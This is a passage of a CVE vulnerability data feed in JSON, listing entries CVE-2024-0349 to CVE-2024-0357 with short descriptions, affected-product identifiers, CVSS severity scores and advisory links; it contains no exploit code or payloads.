Affected is an unknown function of the component File Upload Handler. The manipulation leads to resource consumption. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250116." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:engineers_online_portal_project:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-09T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0349", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904", "name" : "https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904", "name" : "https://mega.nz/file/TU1X3TIQ#7bPvxEP0KrdoDZVg-dqinNC5fEQrG5uu58jWzPGh904", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250117", "name" : "https://vuldb.com/?ctiid.250117", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250117", "name" : "https://vuldb.com/?ctiid.250117", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250117", "name" : "https://vuldb.com/?id.250117", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250117", "name" : "https://vuldb.com/?id.250117", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to sensitive cookie without secure attribute. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-250117 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:engineers_online_portal_project:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-09T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0350", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE", "name" : "https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE", "name" : "https://mega.nz/file/fckFBASJ#lffaC0xY44ri9Ln-7hrUbUtq2GTiE8roiW8guR7QeVE", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250118", "name" : "https://vuldb.com/?ctiid.250118", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250118", "name" : "https://vuldb.com/?ctiid.250118", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250118", "name" : "https://vuldb.com/?id.250118", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250118", "name" : "https://vuldb.com/?id.250118", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Engineers Online Portal 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. VDB-250118 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:engineers_online_portal_project:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-09T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0351", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg", "name" : "https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg", "name" : "https://mega.nz/file/LJlBQLhR#Ix4yNMdtVtlJFQP6Ae6fbXmnyH4bXTTAWN_JT5kzXzg", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250119", "name" : "https://vuldb.com/?ctiid.250119", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250119", "name" : "https://vuldb.com/?ctiid.250119", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250119", "name" : "https://vuldb.com/?id.250119", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250119", "name" : "https://vuldb.com/?id.250119", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in SourceCodester Engineers Online Portal 1.0. This affects an unknown part. The manipulation leads to session fixiation. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250119." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:engineers_online_portal_project:engineers_online_portal:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 3.5, "baseSeverity" : "LOW" }, "exploitabilityScore" : 0.9, "impactScore" : 2.5 } }, "publishedDate" : "2024-01-09T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0352", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/ciwYj7QXC4sZ", "name" : "https://note.zhaoj.in/share/ciwYj7QXC4sZ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/ciwYj7QXC4sZ", "name" : "https://note.zhaoj.in/share/ciwYj7QXC4sZ", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250120", "name" : "https://vuldb.com/?ctiid.250120", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250120", "name" : "https://vuldb.com/?ctiid.250120", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250120", "name" : "https://vuldb.com/?id.250120", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250120", "name" : "https://vuldb.com/?id.250120", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250120." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.5.7.20210311", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-09T23:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0353", "ASSIGNER" : "security@eset.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://packetstormsecurity.com/files/179495/ESET-NOD32-Antivirus-17.2.7.0-Unquoted-Service-Path.html", "name" : "https://packetstormsecurity.com/files/179495/ESET-NOD32-Antivirus-17.2.7.0-Unquoted-Service-Path.html", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://packetstormsecurity.com/files/182464/ESET-NOD32-Antivirus-18.0.12.0-Unquoted-Service-Path.html", "name" : "https://packetstormsecurity.com/files/182464/ESET-NOD32-Antivirus-18.0.12.0-Unquoted-Service-Path.html", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed", "name" : "https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed", "name" : "https://support.eset.com/en/ca8612-eset-customer-advisory-link-following-local-privilege-escalation-vulnerability-in-eset-products-for-windows-fixed", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Local privilege escalation vulnerability potentially allowed an attacker to misuse ESET’s file operations to delete files without having proper permission." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:file_security:*:*:*:*:*:azure:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:security:*:*:*:*:*:sharepoint_server:*:*", "versionStartIncluding" : "9.0", "versionEndExcluding" : "9.0.15006.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:security:*:*:*:*:*:sharepoint_server:*:*", "versionStartIncluding" : "8.0", "versionEndExcluding" : "8.0.15012.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:security:*:*:*:*:*:sharepoint_server:*:*", "versionEndExcluding" : "7.3.15006.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:domino:*:*", "versionStartIncluding" : "10.0", "versionEndExcluding" : "10.0.14007.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:domino:*:*", "versionStartIncluding" : "9.0", "versionEndExcluding" : "9.0.14008.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:domino:*:*", "versionStartIncluding" : "8.0", "versionEndExcluding" : "8.0.14014.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:domino:*:*", "versionEndExcluding" : "7.3.14006.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:exchange_server:*:*", "versionStartIncluding" : "10.1", "versionEndExcluding" : "10.1.10014.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:exchange_server:*:*", "versionStartIncluding" : "10.0", "versionEndExcluding" : "10.0.10018.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:exchange_server:*:*", "versionStartIncluding" : "9.0", "versionEndExcluding" : "9.0.10012.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:exchange_server:*:*", "versionStartIncluding" : "8.0", "versionEndExcluding" : "8.0.10024.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:mail_security:*:*:*:*:*:exchange_server:*:*", "versionEndExcluding" : "7.3.10018.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:server_security:*:*:*:*:*:windows_server:*:*", "versionStartIncluding" : "10.0", "versionEndExcluding" : "10.0.12015.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:server_security:*:*:*:*:*:windows_server:*:*", "versionStartIncluding" : "9.0", "versionEndExcluding" : "9.0.12019.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:server_security:*:*:*:*:*:windows_server:*:*", "versionStartIncluding" : "8.0", "versionEndExcluding" : "8.0.12016.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:server_security:*:*:*:*:*:windows_server:*:*", "versionEndExcluding" : "7.3.12013.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_security:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "11.0", "versionEndExcluding" : "11.0.2032.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:security:*:*:*:*:*:sharepoint_server:*:*", "versionStartIncluding" : "10.0", "versionEndExcluding" : "10.0.15005.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_security:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "10.1", "versionEndExcluding" : "10.1.2063.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_security:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "10.0", "versionEndExcluding" : "10.0.2052.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_security:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "9.0", "versionEndExcluding" : "9.1.2071.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_security:*:*:*:*:*:windows:*:*", "versionEndExcluding" : "8.1.2062.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_antivirus:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "11.0", "versionEndExcluding" : "11.0.2032.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_antivirus:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "10.1", "versionEndExcluding" : "10.1.2063.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_antivirus:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "10.0", "versionEndExcluding" : "10.0.2052.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_antivirus:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "9.0", "versionEndExcluding" : "9.1.2071.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:endpoint_antivirus:*:*:*:*:*:windows:*:*", "versionEndExcluding" : "8.1.2062.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:security:*:*:*:*:ultimate:*:*:*", "versionEndExcluding" : "17.0.10.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:smart_security:*:*:*:*:premium:*:*:*", "versionEndExcluding" : "17.0.10.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:internet_security:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.0.10.0", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:eset:nod32_antivirus:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.0.10.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-15T08:15Z", "lastModifiedDate" : "2025-01-23T17:18Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0354", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/nHD5xiHQgHG0", "name" : "https://note.zhaoj.in/share/nHD5xiHQgHG0", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/nHD5xiHQgHG0", "name" : "https://note.zhaoj.in/share/nHD5xiHQgHG0", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250121", "name" : "https://vuldb.com/?ctiid.250121", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250121", "name" : "https://vuldb.com/?ctiid.250121", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250121", "name" : "https://vuldb.com/?id.250121", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250121", "name" : "https://vuldb.com/?id.250121", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in unknown-o download-station up to 1.1.8. This issue affects some unknown processing of the file index.php. The manipulation of the argument f leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250121 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:unknown-o:download-station:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.1.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-10T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0355", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8", "name" : "https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8", "name" : "https://medium.com/@heishou/dfsms-has-sql-injection-vulnerability-e9cfbc375be8", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250122", "name" : "https://vuldb.com/?ctiid.250122", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250122", "name" : "https://vuldb.com/?ctiid.250122", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250122", "name" : "https://vuldb.com/?id.250122", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250122", "name" : "https://vuldb.com/?id.250122", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in PHPGurukul Dairy Farm Shop Management System up to 1.1. Affected is an unknown function of the file add-category.php. The manipulation of the argument category leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250122 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T00:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0356", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e", "name" : "https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e", "name" : "https://medium.com/@heishou/ssm-has-a-vertical-override-vulnerability-8728da71842e", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250123", "name" : "https://vuldb.com/?ctiid.250123", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250123", "name" : "https://vuldb.com/?ctiid.250123", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250123", "name" : "https://vuldb.com/?id.250123", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250123", "name" : "https://vuldb.com/?id.250123", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Mandelo ssm_shiro_blog 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file updateRoles of the component Backend. The manipulation leads to improper access controls. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250123." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mandelo:ssm_shiro_blog:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-10T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0357", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md", "name" : "https://github.com/laoquanshi/heishou/blob/main/eva%20sql.md", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250124", 